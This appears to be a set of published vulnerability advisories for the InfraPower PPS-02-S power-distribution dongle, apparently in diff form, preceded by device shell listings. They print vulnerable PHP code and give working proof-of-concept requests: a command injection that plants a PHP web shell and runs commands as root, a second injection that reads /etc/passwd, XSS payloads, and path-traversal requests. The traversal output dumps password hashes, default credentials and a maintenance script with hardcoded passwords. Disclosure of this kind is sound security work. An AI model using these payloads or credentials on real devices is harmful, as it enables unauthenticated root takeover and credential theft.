+/bin/sh
+/mnt/mtd # 
+
+--------
+
+/mnt/mtd # ls
+IMG001.exe         boot.old.sh        load_config.log    main_conf          net_conf           passwd_conf        snmp_conf          web_conf
+PDU3_ini           box_conf           log_memCheck.txt   main_conf.bak      net_conf.old       port_conf          snmpd.conf
+PDU3_pol           info.zip           mac_addr           me_login           ntp_conf           private            start_service.log
+
+--------
+
+/mnt/mtd # df -h
+
+Filesystem                Size      Used Available Use% Mounted on
+tmpfs                   256.0M      4.0K    256.0M   0% /tmp
+/dev/mtdblock1            1.4M     96.0K      1.3M   7% /mnt/mtd
+/dev/mtdblock5            1.0M     60.0K    964.0K   6% /mnt/mtd1
+/dev/mtdblock6            1.0M     60.0K    964.0K   6% /mnt/mtd2
+/dev/mtdblock7            1.0M     60.0K    964.0K   6% /mnt/mtd3
+
+--------
+
+/www # ls -al
+
+drwxr-xr-x    5 1013     1014            0 Jan 13 08:41 .
+drwxr-xr-x   16 root     root            0 Nov 28 11:17 ..
+-rwxr--r--    1 1013     1014         6875 Apr 22  2014 CSSSource.php
+-rwxr--r--    1 1013     1014          291 Apr 22  2014 Config.php
+-rwxr--r--    1 1013     1014         1685 Apr 22  2014 ConnPort.php
+-rwxr--r--    1 1013     1014         5787 Apr 22  2014 FWUpgrade.php
+-rwxr--r--    1 1013     1014         7105 Apr 22  2014 Firmware.php
+-rwxr--r--    1 1013     1014        10429 Apr 22  2014 Function.php
+drwxr-xr-x    2 1013     1014            0 Apr 22  2014 General
+-rwxr--r--    1 1013     1014         1407 Apr 22  2014 Header.php
+-rwxr--r--    1 1013     1014         6775 Apr 22  2014 IPSettings.php
+drwxr-xr-x    2 1013     1014            0 Apr 22  2014 Images
+drwxr-xr-x    2 1013     1014            0 Apr 22  2014 JavaScript
+-rwxr--r--    1 1013     1014          408 Apr 22  2014 JavaSource.php
+-rwxr--r--    1 1013     1014          849 Apr 22  2014 ListFile.php
+-rwxr--r--    1 1013     1014        12900 Apr 22  2014 Login.php
+-rwxr--r--    1 1013     1014          355 Apr 22  2014 Logout.php
+-rwxr--r--    1 1013     1014          352 Apr 22  2014 Main_Config.php
+-rwxr--r--    1 1013     1014         5419 Apr 22  2014 Menu.php
+-rwxr--r--    1 1013     1014          942 Apr 22  2014 Menu_3.php
+-rwxr--r--    1 1013     1014         4491 Apr 22  2014 Ntp.php
+-rwxr--r--    1 1013     1014        23853 Apr 22  2014 OutletDetails.php
+-rwxr--r--    1 1013     1014         1905 Apr 22  2014 OutletDetails_Ajax.php
+-rwxr--r--    1 1013     1014        48411 Apr 22  2014 PDUDetails.php
+-rwxr--r--    1 1013     1014         4081 Apr 22  2014 PDUDetails_Ajax_Details.php
+-rwxr--r--    1 1013     1014         1397 Apr 22  2014 PDUDetails_Ajax_Outlet.php
+-rwxr--r--    1 1013     1014        19165 Apr 22  2014 PDULog.php
+-rwxr--r--    1 1013     1014        29883 Apr 22  2014 PDUStatus.php
+-rwxr--r--    1 1013     1014         4418 Apr 22  2014 PDUStatus_Ajax.php
+-rwxr--r--    1 1013     1014         7791 Apr 22  2014 PortSettings.php
+-rwxr--r--    1 1013     1014        24696 Apr 22  2014 SNMP.php
+-rwxr--r--    1 1013     1014        38253 Apr 22  2014 SensorDetails.php
+-rwxr--r--    1 1013     1014        27210 Apr 22  2014 SensorStatus.php
+-rwxr--r--    1 1013     1014         5984 Apr 22  2014 SensorStatus_Ajax.php
+-rwxr--r--    1 1013     1014        40944 Apr 22  2014 System.php
+-rwxr--r--    1 1013     1014         4373 Apr 22  2014 UploadEXE.php
+-rwxr--r--    1 1013     1014         9460 Apr 22  2014 User.php
+-rwxr--r--    1 1013     1014        23170 Apr 22  2014 WriteRequest.php
+-rwxr--r--    1 1013     1014         8850 Apr 22  2014 WriteRequest_Ajax.php
+-rwxr--r--    1 1013     1014        10811 Apr 22  2014 dball.php
+-rwxr--r--    1 1013     1014          771 Apr 22  2014 doupgrate.php
+-rwxr--r--    1 1013     1014           76 Apr 22  2014 index.php
+-rwxr--r--    1 1013     1014           49 Apr 22  2014 nfs.sh
+-rwxr--r--    1 1013     1014         5410 Apr 22  2014 production_test1.php
+-rwxr--r--    1 1013     1014          723 Apr 22  2014 vaildate.php
+-rwxr--r--    1 1013     1014          611 Apr 22  2014 wiseup.php
+

platforms/hardware/webapps/40640.txt

@@ -0,0 +1,348 @@
+InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: InfraPower suffers from multiple unauthenticated remote command
+injection vulnerabilities. The vulnerability exist due to several POST
+parameters in several scripts not being sanitized when using the exec(),
+proc_open(), popen() and shell_exec() PHP function while updating the
+settings on the affected device. This allows the attacker to execute
+arbitrary system commands as the root user and bypass access controls in
+place.
+
+Tested on: Linux 2.6.28 (armv5tel)
+           lighttpd/1.4.30-devel-1321
+           PHP/5.3.9
+           SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5372
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5372.php
+
+
+27.09.2016
+
+--
+
+
+doupgrate.php:
+--------------
+
+
+09: <?
+10: echo "Firmware Upgrate Using NFS:<BR>";
+11: echo "IP=".$_POST["ipaddr"]."<BR>";
+12: echo "Firmware Name=".$_POST["fwname"]."<BR>";
+13: system("sh nfs.sh");
+14: echo "Mounting NFS<BR>";
+15: system("mount -t nfs -o nolock ".$_POST["ipaddr"].":".$_POST["nfsdir"]." /nfs");
+16: system("cp /nfs/".$_POST["fwname"]." /");
+17: echo "Flash erasing<BR>";
+18: system("@flash_eraseall /dev/mtd0");
+19: system("cp /".$_POST["fwname"]." /dev/mtd0");
+20: echo "Upgrate done<BR>";
+21: system("umount /nfs");
+22: echo "Reboot system<BR>";
+23: system("reboot");
+24: ?>
+
+---------------------------------------------------------------------
+
+
+IPSettings.php:
+---------------
+
+
+83: $IP_setting = ereg_ip($_POST['IP']);
+84: $Netmask_setting = ereg_ip($_POST['Netmask']);
+85: $Gateway_setting = ereg_ip($_POST['Gateway']);
+...
+...
+110:                    $fout = fopen("/mnt/mtd/net_conf", "w");
+111:                    if($fout){
+112:                        $output = substr($output, 0, -1);
+113:                        fprintf($fout, "%s", $output);
+114:                        //echo $change_ip.'b';
+115:                        if($change_ip === '1'){
+116:                            $str = '';
+117:                            exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
+118: //                          echo $str."\n";
+119:                        }
+120:                        if($change_gw === '1'){
+121:                            $str = '';
+122:                            exec('ip route del default', $str);
+123:                            exec('route add default gw '.$Gateway_setting, $str);
+124: //                          echo $str[0]."a\n";
+125:                        }
+126:                    }
+127:                    fclose($fout);
+...
+...
+164:    function ereg_ip($ipstring){ 
+165:         $ipstring=trim($ipstring); //移除前後空白 
+166:        //格式錯誤 
+167:        if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0; 
+168:        //內容檢查 
+169:        $ip_segment =split("\.",$ipstring); //注意一定要加 "\"，否則會分不開。 
+170:        foreach($ip_segment as $k =>$v){ 
+171:            if($v >255){ 
+171:                return 0; 
+172:            }
+173:            $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0，ex:1.020.003.004 =>1.20.3.4 
+174:        } //end foreach 
+175:        $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理 
+176:        return $ipstring; 
+177:    }
+
+---------------------------------------------------------------------
+
+
+Login.php:
+----------
+
+
+126:         $UserName = getConf("/mnt/mtd/web_conf", "UserName");
+127:         $Password = getConf("/mnt/mtd/web_conf", "Password");
+128:
+129:         //echo 'z'.$_POST['ID_User'].';'.$UserName.' Pwd:'.$_POST['ID_Password'].';'.$Password;
+130:         if($_POST['ID_User'] === $UserName && $_POST['ID_Password'] === $Password){
+...
+...
+140:             $_SESSION['Login'] = $_POST['ID_User'];
+141: 
+142:             //Login
+143:             $loginTime = date("Y-m-d,H:i:s.0,P");
+144:             $remoteIP = $_SERVER['REMOTE_ADDR'];
+145: //----------SNMP checking ---Ed 20130307------------------------<
+146:             $SNMPEnable = getConf("/mnt/mtd/snmp_conf", "enable");
+147:             if ($SNMPEnable == "1") {
+148:                 $TrapEnable = getConf("/mnt/mtd/snmp_conf", "trap");
+149:                 if ($TrapEnable == "v2Trap") {
+150:                     $trapTo = getConf("/mnt/mtd/snmp_conf", "IP");
+151:                     shell_exec('/usr/bin/snmptrap -M /usr/share/snmp/mibs/ -c public -v 2c ' . $trapTo . ' \'\' InfraPower-MIB::webLogin InfraPower-MIB::objectDateTime s "' . $loginTime . '"  InfraPower-MIB::userName s "' . $_POST['ID_User'] . '" InfraPower-MIB::webAccessIpAddress s "' . $remoteIP . '"');
+152:                     //echo "alert($res);";
+153:                 }
+154:             }
+
+---------------------------------------------------------------------
+
+
+Ntp.php:
+--------
+
+
+36: <?php
+37: if(empty($_POST['Change']))
+38:   $tzone='8';
+39: else
+40: {
+41:
+42: $tzone=$_POST['ID_timezone'];
+43: $idx=$tzone+12;
+44: echo "update status...";
+45: exec("/usr/bin/ntpclient  -s -h 220.130.158.71");
+46: exec("/usr/bin/zonegen ".$idx);
+47: exec("/usr/bin/zic -d /usr/bin/ zonetime");
+48: exec("mv /usr/bin/localtime /etc/localtime");
+49: echo "OK"; 
+50: }
+51: ?>
+
+---------------------------------------------------------------------
+
+
+production_test1.php:
+---------------------
+
+
+4:  if( isset($_POST['macAddress']) )
+5:      {
+6:          shell_exec("echo ". $_POST['macAddress'] . " > /mnt/mtd/mac_addr");
+7:          $mac = shell_exec("cat /mnt/mtd/mac_addr");
+8:          /*$result = $fail;
+9:          echo $mac . ",";
+10:         echo $_POST['macAddress'];
+11:         if( !strcmp($mac,$_POST['macAddress']) )
+12:             $result = $success;
+13:         echo "verify - " . $mac . " - " . $result;*/
+14:         echo "verify - " . $mac;
+15:
+16:         exit();
+17:     }
+
+---------------------------------------------------------------------
+
+
+SNMP.php:
+---------
+
+
+34: if($_POST["SNMPAgent"] === "Enable"){
+35:     exec('kill -9 `ps | grep "snmpd -c /mnt/mtd/snmpd.conf" | cut -c 1-5`');
+36:     setConf("/mnt/mtd/snmp_conf", "enable", "1");
+37:
+38:     if(!empty($_POST["CommuintyString"]) && !empty($_POST["CommuintyWrite"]))
+39:         {
+40:               exec("cp /etc/snmpd.conf /mnt/mtd/snmpd.conf");
+41:               exec("sed -i s/public/".$_POST["CommuintyString"]."/g /mnt/mtd/snmpd.conf");
+42:               setConf("/mnt/mtd/snmp_conf", "pCommunity", $_POST["CommuintyString"]);
+43:               setSnmpConf(1,$_POST["CommuintyString"]);
+44:               setSnmpConf(2,$_POST["CommuintyWrite"]);
+45:               $pCommunity = $_POST["CommuintyString"];
+46:         }
+
+---------------------------------------------------------------------
+
+
+System.php:
+-----------
+
+
+86:    if(!empty($_POST['ChangeTime']) == "1"){
+87:        if(checkdate($_POST['month'], $_POST['day'], $_POST['year']) == 1){
+88:
+89:        //Ray modify
+90:        $datetime = date("mdHiY.s", mktime($_POST['hour']-1,$_POST['minute']-1,$_POST['second']-1,$_POST['month'],$_POST['day'],$_POST['year']));
+91:        //$datetime = $_POST['month'].$_POST['day'].$_POST['hour'].$_POST['minute'].$_POST['year'].'.'.$_POST['second'];
+92:        
+93:
+94:        if(isset($_POST['TimeZone'])){
+95:            setTimeZone($_POST['TimeZone']);
+96:            $orgZone = $_POST['TimeZone'];
+97:        }
+98:
+99:        exec('date '.$datetime);
+100:        exec('hwclock -w');
+101:        exec('hwclock -w -f /dev/rtc1');
+...
+...
+180:        if(isset($_POST['TimeServer'])){
+181:            //$TimeServer = ereg_ip($_POST['TimeServer']);          
+182:            if(!empty($_POST['TimeServer'])){
+183:            $TimeServer = $_POST['TimeServer'];             
+184:
+185:                $returnStr = exec("/usr/bin/ntpclient  -s -h ".$TimeServer . " -i 1");
+...
+...
+286: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
+...
+...
+292: exec('route add default gw '.$Gateway_setting, $str);
+...
+...
+336:    function ereg_ip($ipstring){
+337:         $ipstring=trim($ipstring); //移除前後空白
+338:        //格式錯誤
+339:        if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
+340:        //內容檢查
+341:        $ip_segment =split("\.",$ipstring); //注意一定要加 "\"，否則會分不開。
+342:        foreach($ip_segment as $k =>$v){
+343:            if($v >255){
+344:                return 0;
+345:            }
+346:            $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0，ex:1.020.003.004 =>1.20.3.4
+347:        } //end foreach
+348:        $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
+349:        return $ipstring;
+350:    }
+
+---------------------------------------------------------------------
+
+
+UploadEXE.php:
+--------------
+
+
+72:  if(isset($_POST['hasFile'])){
+73:      if ($_FILES['ExeFile']['error'] > 0){
+74:          echo 'Error: ' . $_FILES['FW']['error'];
+75:      }else{
+76:          echo 'File Name: ' . $_FILES['ExeFile']['name'].'<br/>';
+...
+...
+80:          move_uploaded_file($_FILES['ExeFile']['tmp_name'], '/ramdisk/'.$_FILES['ExeFile']['name']);
+81:          chmod("/ramdisk/".$_FILES['ExeFile']['name'], "0777");
+82:          $fp = popen("\"/ramdisk/".$_FILES['ExeFile']['name']."\"", "r");
+
+---------------------------------------------------------------------
+---------------------------------------------------------------------
+---------------------------------------------------------------------
+
+
+#1
+--
+
+PoC Request:
+
+curl -i -s -k  -X 'POST' \
+    -H 'User-Agent: ZSL-Injectinator/3.1 (Unix)' -H 'Content-Type: application/x-www-form-urlencoded' \
+    --data-binary $'SNMPAgent=Enable&CommuintyString=public|%65%63%68%6f%20%22%3c%3f%70%68%70%20%65%63%68%6f%20%73%79%73%74%65%6d%28%5c%24%5f%47%45%54%5b%27%63%27%5d%29%3b%20%3f%3e%22%20%3Etest251.php%26&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254' \
+    'https://192.168.0.17/SNMP.php?Menu=SMP'
+
+...
+
+curl -k https://192.168.0.17/test251.php?c=whoami;echo " at ";uname -a
+
+Response:
+
+root 
+ at
+Linux A320D 2.6.28 #866 PREEMPT Tue Apr 22 16:07:03 HKT 2014 armv5tel unknown
+
+
+#2
+--
+
+PoC Request:
+
+POST /production_test1.php HTTP/1.1
+Host: 192.168.0.17
+User-Agent: ZSL-Injectinator/3.1 (Unix)
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+macAddress=ZE:RO:SC:IE:NC:E0;cat /etc/passwd
+
+
+Response:
+
+HTTP/1.1 200 OK
+X-Powered-By: PHP/5.3.9
+Content-type: text/html
+Connection: close
+Date: Fri, 17 Jan 2003 16:58:52 GMT
+Server: lighttpd/1.4.30-devel-1321
+Content-Length: 751
+
+verify - root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
+bin:x:1:1:bin:/bin:/bin/sh
+daemon:x:2:2:daemon:/usr/sbin:/bin/sh
+adm:x:3:4:adm:/adm:/bin/sh
+lp:x:4:7:lp:/var/spool/lpd:/bin/sh
+sync:x:5:0:sync:/bin:/bin/sync
+shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
+operator:x:11:0:Operator:/var:/bin/sh
+nobody:x:99:99:nobody:/home:/bin/sh
+admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
+user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
+service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
+www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
+www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh

platforms/php/webapps/40641.txt

@@ -0,0 +1,235 @@
+InfraPower PPS-02-S Q213V1 Multiple XSS Vulnerabilities
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: InfraPower suffers from multiple stored and reflected XSS vulnerabilities
+when input passed via several parameters to several scripts is not properly
+sanitized before being returned to the user. This can be exploited to execute
+arbitrary HTML and script code in a user's browser session in context of an affected
+site.
+
+Tested on: Linux 2.6.28 (armv5tel)
+           lighttpd/1.4.30-devel-1321
+           PHP/5.3.9
+           SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+                           @zeroscience
+
+
+Advisory ID: ZSL-2016-5369
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5369.php
+
+
+27.09.2016
+
+--
+
+
+#################################################################################
+
+GET /SensorDetails.php?Menu=SST&DeviceID=C100"><script>alert(1)</script> HTTP/1.1
+
+#################################################################################
+
+POST /FWUpgrade.php HTTP/1.1
+Host: 192.168.0.17
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary207OhXVwesC60pdh
+Connection: close
+
+------WebKitFormBoundary207OhXVwesC60pdh
+Content-Disposition: form-data; name="FW"; filename="somefile.php<img src=x onerror=confirm(2)>"
+Content-Type: text/php
+
+t00t
+------WebKitFormBoundary207OhXVwesC60pdh
+Content-Disposition: form-data; name="upfile"
+
+somefile.php
+------WebKitFormBoundary207OhXVwesC60pdh
+Content-Disposition: form-data; name="ID_Page"
+
+Firmware.php?Menu=FRM
+------WebKitFormBoundary207OhXVwesC60pdh--
+
+
+#################################################################################
+
+POST /SNMP.php?Menu=SMP HTTP/1.1
+Host: 192.168.0.17
+
+SNMPAgent=Enable&CommuintyString=public&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254';alert(3)//
+
+#################################################################################
+
+
+lqwrm@zslab:~#
+lqwrm@zslab:~# ./scanmyphp -v -r -d infrapower -o scan_output.txt
+-------------------------------------------------
+PHP Source Code Security Scanner v0.2
+(c) Zero Science Lab - http://www.zeroscience.mk
+Tue Sep 27 10:35:52 CEST 2016
+-------------------------------------------------
+
+Scanning recursively...Done.
+
+dball.php:
+
+Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
+Line 45: Cross-Site Scripting (XSS) in 'echo' via '$Table'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
+
+
+doupgrate.php:
+
+Line 11: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
+Line 12: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
+Line 15: Command Injection in 'system' via '$_POST'
+Line 16: Command Injection in 'system' via '$_POST'
+Line 19: Command Injection in 'system' via '$_POST'
+
+
+Firmware.php:
+
+Line 166: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
+
+
+Function.php:
+
+Line 257: Header Injection in 'header' via '$_SERVER'
+Line 267: Header Injection in 'header' via '$_SERVER'
+
+
+FWUpgrade.php:
+
+Line 39: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 43: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 44: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+
+
+index.php:
+
+Line 2: Header Injection in 'header' via '$_SERVER'
+
+
+IPSettings.php:
+
+Warning: ereg() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
+Warning: split() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
+Line 117: Command Injection in 'exec' via '$IP_setting'
+Line 117: Command Injection in 'exec' via '$Netmask_setting'
+Line 123: Command Injection in 'exec' via '$Gateway_setting'
+
+
+ListFile.php:
+
+Line 12: PHP File Inclusion in 'fgets' via '$fp'
+
+
+Login.php:
+
+Line 151: Command Injection in 'shell_exec' via '$_POST'
+
+
+Ntp.php:
+
+Line 46: Command Injection in 'exec' via '$idx'
+
+
+OutletDetails.php:
+
+Line 78: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 241: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 623: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 674: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 730: Cross-Site Scripting (XSS) in 'echo' via '$row'
+Line 732: Cross-Site Scripting (XSS) in 'echo' via '$row'
+Line 914: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+
+
+PDUStatus.php:
+
+Line 625: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
+
+
+production_test1.php:
+
+Line 6: Command Injection in 'shell_exec' via '$_POST'
+Line 45: Command Injection in 'proc_open' via '$_ENV'
+
+
+SensorDetails.php:
+
+Line 844: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 896: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 1233: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+
+
+SensorStatus.php:
+
+Line 695: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
+
+
+SNMP.php:
+
+Line 41: Command Injection in 'exec' via '$_POST'
+
+
+System.php:
+
+Line 54: Header Injection in 'header' via '$_SERVER'
+Line 64: Header Injection in 'header' via '$_SERVER'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 185: Command Injection in 'exec' via '$TimeServer'
+Line 286: Command Injection in 'exec' via '$IP_setting'
+Line 286: Command Injection in 'exec' via '$Netmask_setting'
+Line 292: Command Injection in 'exec' via '$Gateway_setting'
+
+
+UploadEXE.php:
+
+Line 74: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 76: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 82: Command Injection in 'popen' via '$_FILES'
+Line 96: PHP File Inclusion in 'fgets' via '$fp'
+Line 96: PHP File Inclusion in 'fgets' via '$buffer'
+
+
+WriteRequest.php:
+
+Line 96: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
+Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
+Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
+
+
+-----------------------------------------------------
+Scan finished. Check results in scan_output.txt file.
+
+lqwrm@zslab:~# 

platforms/php/webapps/40642.txt

@@ -0,0 +1,389 @@
+InfraPower PPS-02-S Q213V1 Local File Disclosure Vulnerability
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: InfraPower suffers from a file disclosure vulnerability when
+input passed thru the 'file' parameter to 'ListFile.php' script is
+not properly verified before being used to read files. This can
+be exploited to disclose contents of files from local resources.
+
+-------------------------------------------------------------------
+ListFile.php:
+-------------
+
+8: if(isset($_GET['file'])){
+9: 	   $handle = $_GET['file'];
+10:    $fp = fopen('/ramdisk/'.$handle, 'r');
+11:    while(!feof($fp)){
+12:        $tmp=fgets($fp,2000);
+13:        $tmp = str_replace("\n","<br />",$tmp);
+14:        echo $tmp;
+15:    }
+16:    fclose($fp);
+17: }
+
+-------------------------------------------------------------------
+
+
+Tested on: Linux 2.6.28 (armv5tel)
+           lighttpd/1.4.30-devel-1321
+           PHP/5.3.9
+           SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+                           @zeroscience
+
+
+Advisory ID: ZSL-2016-5370
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5370.php
+
+
+27.09.2016
+
+--
+
+
+http://192.168.0.17/ListFile.php?file=../../../../../../../etc/passwd
+
+root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
+bin:x:1:1:bin:/bin:/bin/sh
+daemon:x:2:2:daemon:/usr/sbin:/bin/sh
+adm:x:3:4:adm:/adm:/bin/sh
+lp:x:4:7:lp:/var/spool/lpd:/bin/sh
+sync:x:5:0:sync:/bin:/bin/sync
+shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
+operator:x:11:0:Operator:/var:/bin/sh
+nobody:x:99:99:nobody:/home:/bin/sh
+admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
+user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
+service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
+www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
+www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
+
+
+http://192.168.0.17/ListFile.php?file=../../../../../../../etc/web_conf
+
+LoginAuth 1
+UserName 00000000
+Password 00000000
+
+
+http://192.168.0.17/ListFile.php?file=../../../../../../../mnt/mtd/password_conf
+
+dmin 999999
+manager 666666
+user 111111
+
+
+http://192.168.0.17/ListFile.php?file=../../../../../../../sbin/maintenance_shell.sh
+
+#!/bin/sh
+echo -n "Please enter maintenance password:"
+read -s pass
+InfraType=`cat /mnt/mtd/main_conf | grep "InfraType" | cut -d " " -f 2`
+if [ "$InfraType" == "1" ]; then
+if [ "$pass" != "InfraSolution" ]; then
+echo "Invalid maintenance password!"
+exit 0
+fi
+else
+if [ "$InfraType" == "2" ]; then
+if [ "$pass" != "InfraGuard" ]; then
+echo "Invalid maintenance password!"
+exit 0
+fi
+else
+if [ "$InfraType" == "3" ]; then
+if [ "$pass" != "InfraPower" ]; then
+echo "Invalid maintenance password!"
+exit 0
+fi
+else
+if [ "$InfraType" == "4" ]; then
+if [ "$pass" != "InfraCool" ]; then
+echo "Invalid maintenance password!"
+exit 0
+fi
+else
+#---emergency recovery mode
+echo "DEBUG su mode started!"
+su
+fi
+fi
+fi
+fi
+
+# create menu
+echo ""
+echo "***********************************************"
+echo "* Maintenance Menu *"
+echo "***********************************************"
+echo "(1) View(vi) /mnt/mtd/main_conf "
+echo "(2) View /mnt/mtd/snmp_conf "
+echo "(3) View /mnt/mtd/net_conf "
+echo "(4) View /mnt/mtd/web_conf "
+echo "(5) Enable auto patching(boot.sh) on bootup "
+echo "(6) Disable auto patching(boot.sh) on bootup "
+echo "(7) Clear all patching (/mnt/mtd/patch/) "
+echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
+echo "(9) Process Monitoring "
+echo "(A) Patch SNMP "
+echo "(B) Restore Configuration "
+echo "(P) Restore INI, POL profiles "
+echo "(E) Execute command line "
+echo "(M) View meminfo "
+echo "(X) Terminal console mode "
+echo "(R) Reboot "
+echo "(?) This menu "
+echo "(Q) Exit "
+echo "***********************************************"
+while true; do
+echo -n "Input Maintenance menu item number(? for help):"
+read y
+case $y in
+"?")
+echo ""
+echo "***********************************************"
+echo "* Maintenance Menu *"
+echo "***********************************************"
+echo "(1) View(vi) /mnt/mtd/main_conf "
+echo "(2) View /mnt/mtd/snmp_conf "
+echo "(3) View /mnt/mtd/net_conf "
+echo "(4) View /mnt/mtd/web_conf "
+echo "(5) Enable auto patching(boot.sh) on bootup "
+echo "(6) Disable auto patching(boot.sh) on bootup "
+echo "(7) Clear all patching (/mnt/mtd/patch/) "
+echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
